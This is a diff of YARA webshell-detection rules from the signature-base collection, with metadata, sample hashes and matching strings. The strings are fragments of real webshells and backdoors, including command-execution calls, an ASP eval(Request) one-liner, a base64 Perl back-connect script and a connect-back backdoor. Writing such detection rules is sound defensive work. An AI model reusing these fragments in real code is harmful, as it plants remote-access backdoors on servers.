+		$s3 = "<form name=\"shell\" action=\"<?php echo $_SERVER['PHP_SELF'] ?>\" method=\"POST"
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Phpspy_2005_Full_Phpspy_2005_Lite_Phpspy_2006_PHPSPY
+rule SIGNATURE_BASE_Asmodeus_V0_1_Pl
 {
 	meta:
-		description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, PHPSPY.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file Asmodeus v0.1.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "cfd082a8-56fa-54bc-a683-c0052f78e12e"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3106-L3126"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4201-L4214"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fc47a50c5964574fb9b9caf3fb94041f028998577bf4ccf21884a41fa1876572"
-		score = 70
+		hash = "0978b672db0657103c79505df69cb4bb"
+		logic_hash = "be0130c9d2a5d29e6ef8749b0058c96c2ca1ecb9823fd14a8a2c82978cf3d104"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "b68bfafc6059fd26732fa07fb6f7f640"
-		hash1 = "42f211cec8032eb0881e87ebdb3d7224"
-		hash2 = "40a1f840111996ff7200d18968e42cfe"
-		hash3 = "0712e3dc262b4e1f98ed25760b206836"
 
 	strings:
-		$s4 = "http://www.4ngel.net" fullword
-		$s5 = "</a> | <a href=\"?action=phpenv\">PHP" fullword
-		$s8 = "echo $msg=@fwrite($fp,$_POST['filecontent']) ? \"" fullword
-		$s9 = "Codz by Angel" fullword
+		$s0 = "[url=http://www.governmentsecurity.org"
+		$s1 = "perl asmodeus.pl client 6666 127.0.0.1"
+		$s2 = "print \"Asmodeus Perl Remote Shell"
+		$s4 = "$internet_addr = inet_aton(\"$host\") or die \"ALOA:$!\\n\";" fullword
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_Webshell_C99_Locus7S_C99_W4Cking_Xxx
+rule SIGNATURE_BASE_Backup_Php_Often_With_C99Shell
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file backup.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3127-L3156"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4215-L4227"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4afadac41e729f77711eb3ea3ee8f6e8ce61e19294e90db024e5334e214d9647"
-		score = 70
+		hash = "aeee3bae226ad57baf4be8745c3f6094"
+		logic_hash = "e27d00ebfbac2565568b9a97552a331db91b4e9aa318febb048937f5c3a1a1ba"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "38fd7e45f9c11a37463c3ded1c76af4c"
-		hash1 = "9c34adbc8fd8d908cbb341734830f971"
-		hash2 = "ef43fef943e9df90ddb6257950b3538f"
-		hash3 = "ae025c886fbe7f9ed159f49593674832"
-		hash4 = "911195a9b7c010f61b66439d9048f400"
-		hash5 = "697dae78c040150daff7db751fc0c03c"
-		hash6 = "513b7be8bd0595c377283a7c87b44b2e"
-		hash7 = "1d912c55b96e2efe8ca873d6040e3b30"
-		hash8 = "e5b2131dd1db0dbdb43b53c5ce99016a"
-		hash9 = "4108f28a9792b50d95f95b9e5314fa1e"
-		hash10 = "b8f261a3cdf23398d573aaf55eaf63b5"
-		hash11 = "0d2c2c151ed839e6bafc7aa9c69be715"
-		hash12 = "41af6fd253648885c7ad2ed524e0692d"
-		hash13 = "6fcc283470465eed4870bcc3e2d7f14d"
 
 	strings:
-		$s1 = "$res = @shell_exec($cfe);" fullword
-		$s8 = "$res = @ob_get_contents();" fullword
-		$s9 = "@exec($cfe,$res);" fullword
+		$s0 = "#phpMyAdmin MySQL-Dump" fullword
+		$s2 = ";db_connect();header('Content-Type: application/octetstr"
+		$s4 = "$data .= \"#Database: $database" fullword
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Browser_201_3_Ma_Ma2_Download
+rule SIGNATURE_BASE_Reader_Asp
 {
 	meta:
-		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, ma2.jsp, download.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file Reader.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "70094d24-fa3a-503c-b9b6-294a883fc52c"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3157-L3178"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4228-L4240"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3b8bb6ca2eb146f8c170d629612ba12d4663445d443b681f2859af25d50ab6fe"
-		score = 70
+		hash = "ad1a362e0a24c4475335e3e891a01731"
+		logic_hash = "ec0dc3b050d84e852e0c18bd00961f109d3506fa7f2e8656448bd5edd28d9305"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
-		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
-		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
-		hash3 = "4cc68fa572e88b669bce606c7ace0ae9"
-		hash4 = "4b45715fa3fa5473640e17f49ef5513d"
-		hash5 = "fa87bbd7201021c1aefee6fcc5b8e25a"
 
 	strings:
-		$s1 = "private static final int EDITFIELD_ROWS = 30;" fullword
-		$s2 = "private static String tempdir = \".\";" fullword
-		$s6 = "<input type=\"hidden\" name=\"dir\" value=\"<%=request.getAttribute(\"dir\")%>\""
+		$s1 = "Mehdi & HolyDemon"
+		$s2 = "www.infilak."
+		$s3 = "'*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width=\"75%"
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_Webshell_000_403_C5_Querydong_Spyjsp2010
+rule SIGNATURE_BASE_Phpshell17_Php
 {
 	meta:
-		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file phpshell17.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "ea1f657c-2023-50bb-a2ee-33c53ee8fb5e"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3179-L3200"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4241-L4253"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dd01bb059d741fedaee17d46355c7cd8a845d714b20ae37db36424544b954d2f"
-		score = 70
+		hash = "9a928d741d12ea08a624ee9ed5a8c39d"
+		logic_hash = "a9306747a5c9756f393c61562ed4a601c75c3a9491ad19a7b7dbae1fbd505e9a"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
-		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
-		hash2 = "8b457934da3821ba58b06a113e0d53d9"
-		hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"
-		hash4 = "655722eaa6c646437c8ae93daac46ae0"
 
 	strings:
-		$s2 = "\" <select name='encode' class='input'><option value=''>ANSI</option><option val"
-		$s7 = "JSession.setAttribute(\"MSG\",\"<span style='color:red'>Upload File Failed!</spa"
-		$s8 = "File f = new File(JSession.getAttribute(CURRENT_DIR)+\"/\"+fileBean.getFileName("
-		$s9 = "((Invoker)ins.get(\"vd\")).invoke(request,response,JSession);" fullword
+		$s0 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>" fullword
+		$s1 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></"
+		$s2 = "href=\"mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>" fullword
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_R57Shell127_R57_Kartal_R57
+rule SIGNATURE_BASE_Myshell_Php_Php
 {
 	meta:
-		description = "Web Shell - from files r57shell127.php, r57_kartal.php, r57.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file myshell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "eaf243cb-fa26-5f34-a724-60a08acff636"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3201-L3219"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4254-L4266"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fd849f76f8348ee57a9c96eed91c8cac416fdc45a08c93e93ebc952375de27a3"
-		score = 70
+		hash = "62783d1db52d05b1b6ae2403a7044490"
+		logic_hash = "dd7b0fa637a8317986de0c2312b4b552f1110fb5a64590a9a21c854e5985fbb6"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "ae025c886fbe7f9ed159f49593674832"
-		hash1 = "1d912c55b96e2efe8ca873d6040e3b30"
-		hash2 = "4108f28a9792b50d95f95b9e5314fa1e"
 
 	strings:
-		$s2 = "$handle = @opendir($dir) or die(\"Can't open directory $dir\");" fullword
-		$s3 = "if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }" fullword
-		$s5 = "if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_"
+		$s0 = "@chdir($work_dir) or ($shellOutput = \"MyShell: can't change directory."
+		$s1 = "echo \"<font color=$linkColor><b>MyShell file editor</font> File:<font color"
+		$s2 = " $fileEditInfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;Owner: <font color=$"
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Con2
+rule SIGNATURE_BASE_Simshell_1_0___Simorgh_Security_MGZ_Php
 {
 	meta:
-		description = "Web shells - generated from file con2.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file SimShell 1.0 - Simorgh Security MGZ.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "51565555-a17b-59c7-b433-c3166fe0d7f0"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3221-L3235"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4267-L4280"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d3584159ab299d546bd77c9654932ae3"
-		logic_hash = "c681b04a1ee4d6af3275b6d772ef35f8bc888a5fcaf3b84f29f77c264e8ad9b9"
-		score = 70
+		hash = "37cb1db26b1b0161a4bf678a6b4565bd"
+		logic_hash = "590a1572877fafcd4425a04c12cd56194f03a63b7acad93c39d4b16dc5a1902d"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s7 = ",htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => e"
-		$s10 = "j \"<Form action='\"&URL&\"?Action2=Post' method='post' name='EditForm'><input n"
+		$s0 = "Simorgh Security Magazine "
+		$s1 = "Simshell.css"
+		$s2 = "} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], "
+		$s3 = "www.simorgh-ev.com"
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Make2
+rule SIGNATURE_BASE_Jspshall_Jsp
 {
 	meta:
-		description = "Web shells - generated from file make2.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file jspshall.jsp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "4bccad33-d26e-52c2-b7f8-802f2c8f3889"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3236-L3249"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4281-L4293"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9af195491101e0816a263c106e4c145e"
-		logic_hash = "7c94c925b5fd7fbc37428c21a9ea3c5a73f4fa0a20a1f5d03f0d5a990bd6f45a"
-		score = 50
+		hash = "efe0f6edaa512c4e1fdca4eeda77b7ee"
+		logic_hash = "94c458d3f38ba21348b0202e2b81bbbc3859e97d64f101a9ea7ec6f036e38bc5"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "error_reporting(0);session_start();header(\"Content-type:text/html;charset=utf-8"
+		$s0 = "kj021320"
+		$s1 = "case 'T':systemTools(out);break;"
+		$s2 = "out.println(\"<tr><td>\"+ico(50)+f[i].getName()+\"</td><td> file"
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Aaa
+rule SIGNATURE_BASE_Webshell_Php
 {
 	meta:
-		description = "Web shells - generated from file aaa.asp"
-		author = "Florian Roth (Nextron Systems)"
+		description = "Semi-Auto-generated  - file webshell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3250-L3265"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4294-L4305"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "68483788ab171a155db5266310c852b2"
-		logic_hash = "3c5b9dd86dc790b03a8540b2fb3a717c5ad17d34f366a319faa127479387eed9"
-		score = 70
+		hash = "e425241b928e992bde43dd65180a4894"
+		logic_hash = "7b0f4f4afde7dcb44c9d877a72c961f3666278ce28a24ae8068cfbc32639e307"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Function fvm(jwv):If jwv=\"\"Then:fvm=jwv:Exit Function:End If:Dim tt,sru:tt=\""
-		$s5 = "<option value=\"\"DROP TABLE [jnc];exec mast\"&kvp&\"er..xp_regwrite 'HKEY_LOCAL"
-		$s17 = "if qpv=\"\" then qpv=\"x:\\Program Files\\MySQL\\MySQL Server 5.0\\my.ini\"&br&"
+		$s2 = "<die(\"Couldn't Read directory, Blocked!!!\");"
+		$s3 = "PHP Web Shell"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Expdoor_Com_ASP
+rule SIGNATURE_BASE_Rootshell_Php
 {
 	meta:
-		description = "Web shells - generated from file Expdoor.com ASP.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file rootshell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "aec6621e-f23a-5f9f-91f1-d2f1b1ab58d0"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3266-L3283"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4306-L4319"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "caef01bb8906d909f24d1fa109ea18a7"
-		logic_hash = "838edb9d718b5e1a8be155c4569b4a291b37337e71b435c2b1cd6bcaa53c0dea"
-		score = 70
+		hash = "265f3319075536030e59ba2f9ef3eac6"
+		logic_hash = "f836dd1825dc84212d32a034c0dde45d60ccd1eb667018abb60d671b61192666"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "\">www.Expdoor.com</a>" fullword
-		$s5 = "    <input name=\"FileName\" type=\"text\" value=\"Asp_ver.Asp\" size=\"20\" max"
-		$s10 = "set file=fs.OpenTextFile(server.MapPath(FileName),8,True)  '" fullword
-		$s14 = "set fs=server.CreateObject(\"Scripting.FileSystemObject\")   '" fullword
-		$s16 = "<TITLE>Expdoor.com ASP" fullword
+		$s0 = "shells.dl.am"
+		$s1 = "This server has been infected by $owner"
+		$s2 = "<input type=\"submit\" value=\"Include!\" name=\"inc\"></p>"
+		$s4 = "Could not write to file! (Maybe you didn't enter any text?)"
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Php2
+rule SIGNATURE_BASE_Connectback2_Pl
 {
 	meta:
-		description = "Web shells - generated from file php2.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file connectback2.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "4ddebc62-17d2-577e-84bd-207367078327"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3284-L3297"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4320-L4332"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fbf2e76e6f897f6f42b896c855069276"
-		logic_hash = "0350df076a25af77fbd8d5db2b38438a10cd5b9237b23b2f64c6360607b41982"
-		score = 70
+		hash = "473b7d226ea6ebaacc24504bd740822e"
+		logic_hash = "7316c93f12dbbf6d0235601d8be88c199e37955507925222d00041d0ceaf01c7"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?php $s=@$_GET[2];if(md5($s.$s)=="
+		$s0 = "#We Are: MasterKid, AleXutz, FatMan & MiKuTuL                                   "
+		$s1 = "echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shel"
+		$s2 = "ConnectBack Backdoor"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Bypass_Iisuser_P
+rule SIGNATURE_BASE_Defacekeeper_0_2_Php
 {
 	meta:
-		description = "Web shells - generated from file bypass-iisuser-p.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file DefaceKeeper_0.2.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "671323e2-42cb-5ce0-9839-5d01c446471c"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3298-L3311"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4333-L4345"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "924d294400a64fa888a79316fb3ccd90"
-		logic_hash = "60d0609291e5def26ce949c903ac767db4157b4f9cf4eee315c69ee7a8d8e77b"
-		score = 70
+		hash = "713c54c3da3031bc614a8a55dccd7e7f"
+		logic_hash = "0ee3fed3441e9561867508e324d7a6b1808a8923513bf1c9b82f8238224c994c"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%Eval(Request(chr(112))):Set fso=CreateObject"
+		$s0 = "target fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>" fullword
+		$s1 = "eval(base64_decode(\"ZXZhbChiYXNlNjRfZGVjb2RlKCJhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUW9"
+		$s2 = "<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Sig_404Super
+rule SIGNATURE_BASE_Shells_PHP_Wso
 {
 	meta:
-		description = "Web shells - generated from file 404super.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file wso.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "fdce6094-a88e-5da6-aeb0-bc97b15bf397"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3312-L3330"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4346-L4357"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7ed63176226f83d36dce47ce82507b28"
-		logic_hash = "01ecffc6bca2acf1ea4f4d965f3513f7b08ee3d5abbda29d53081f2931ecf9e9"
-		score = 70
+		hash = "33e2891c13b78328da9062fbfcf898b6"
+		logic_hash = "31ef69228b66b30300006f63b1e4d6e92c2512caca4bd915d418b48564b39c47"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "$i = pack('c*', 0x70, 0x61, 99, 107);" fullword
-		$s6 = "    'h' => $i('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631')," fullword
-		$s7 = "//http://require.duapp.com/session.php" fullword
-		$s8 = "if(!isset($_SESSION['t'])){$_SESSION['t'] = $GLOBALS['f']($GLOBALS['h']);}" fullword
-		$s12 = "//define('pass','123456');" fullword
-		$s13 = "$GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSIO"
+		$s0 = "$back_connect_p=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbi"
+		$s3 = "echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=pos"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_JSP
+rule SIGNATURE_BASE_Backdoor1_Php
 {
 	meta:
-		description = "Web shells - generated from file JSP.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file backdoor1.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "89f44a1c-8a42-58f6-9308-371f4e652bff"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3331-L3346"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4358-L4370"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "495f1a0a4c82f986f4bdf51ae1898ee7"
-		logic_hash = "bcb2f5d16ff3cc1454bf4653defe037e02a9228a5b7cf7428b1a577f4207c3c8"
-		score = 70
+		hash = "e1adda1f866367f52de001257b4d6c98"
+		logic_hash = "7c8840dc91c16b9fa19fee16e0159a7f13db23c96596e18da0cdab07931ce35b"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"
-		$s5 = "bw.write(z2);bw.close();sb.append(\"1\");}else if(Z.equals(\"E\")){EE(z1);sb.app"
-		$s11 = "if(Z.equals(\"A\")){String s=new File(application.getRealPath(request.getRequest"
+		$s1 = "echo \"[DIR] <A HREF=\\\"\".$_SERVER['PHP_SELF'].\"?rep=\".realpath($rep.\".."
+		$s2 = "class backdoor {"
+		$s4 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?copy=1\\\">Copier un fichier</a> <"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Webshell_123
+rule SIGNATURE_BASE_Elmaliseker_Asp
 {
 	meta:
-		description = "Web shells - generated from file webshell-123.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2023-01-27"
+		description = "Semi-Auto-generated  - file elmaliseker.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "7ecf3d5c-be91-579e-905b-5f2ad03a0e42"
+		date = "2025-03-29"
+		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3347-L3364"
